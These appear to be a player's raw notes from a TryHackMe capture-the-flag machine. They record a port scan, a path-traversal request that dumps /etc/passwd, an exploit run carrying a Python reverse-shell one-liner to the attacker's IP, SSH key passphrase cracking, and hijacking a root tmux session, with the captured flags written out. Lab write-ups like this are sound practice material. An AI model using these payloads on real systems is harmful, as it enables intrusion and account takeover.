Open 10.10.36.190:80
Open 10.10.36.190:1337
Open 10.10.36.190:3306
Open 10.10.36.190:5555
Open 10.10.36.190:8080
Open 10.10.36.190:9999
Open 10.10.36.190:12764
Open 10.10.36.190:31489



http://10.10.36.190:5555/?page=../../../../../../../../etc/passwd



root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
alex:x:1000:1000:alex,,,:/home/alex:/bin/bash
marty:x:1001:1001:,,,:/home/marty:/bin/bash
gloria:x:1002:1002:,,,:/home/gloria:/bin/bash





*notromo is vulnerable 
https://www.exploit-db.com/exploits/47837



python nos.py 10.10.36.190 8080 "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((\"10.9.27.82\", 4321));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"




/home/gloria/user.txt
thm{05e2762150425df49a2d27e8bb08cf2d}




*linpeas


[+] Searching tmux sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions

root      1218  0.0  0.2  28132  2708 ?        Ss   04:06   0:00 /usr/bin/tmux -S /.dev/session new-session -d





*need a better shell to attach 




ssh2john

dance            (gloria_id_rsa)






*ssh access

ssh -i gloria_id_rsa gloria@10.10.36.190 -p 1337

passwd:dance





tmux -S /.dev/session attach -t 0




*flag hunting

/home/alex/user.txt
guz{7732rs0312254rq6886oq84943q12s64}

*rot13

thm{7732ef0312254ed6886bd84943d12f64}




/home/marty/user.txt
}bb7b690f292302856ed9da90e3d9c016{mht



*reverse

echo }bb7b690f292302856ed9da90e3d9c016{mht | rev
thm{610c9d3e09ad9de658203292f096b7bb}





*ran out of time

*check out server.py